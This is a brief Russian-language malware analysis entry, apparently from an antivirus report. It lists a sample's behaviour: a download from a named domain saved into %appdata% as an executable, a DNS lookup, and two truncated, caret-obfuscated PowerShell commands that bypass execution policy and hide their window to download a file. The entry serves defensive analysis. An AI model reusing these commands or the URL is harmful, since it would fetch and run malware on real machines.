Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^w^Ers^hell.eXe ^-eX^ecUTi^o^Np^O^l^ic^y By^p^aS^s -n^oPR^O^fIL^e -^w^in^DoWsTyl^E HIDDEN ^(NEW-^o^b^j^Ec^T S^YsTeM^.NeT.^we^BclIE^Nt)^.dO^wN^L^oA^dFIl^E('http://www.doora...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "po^w^Ers^hell.eXe ^-eX^ecUTi^o^Np^O^l^ic^y By^p^aS^s -n^oPR^O^fIL^e -^w^in^DoWsTyl^E HIDDEN ^(NEW-^o^b^j^Ec^T S^YsTeM^.NeT.^we^BclIE^Nt)^.dO^wN^L^oA^dFIl^E('http://www.doora...' (со скрытым окном)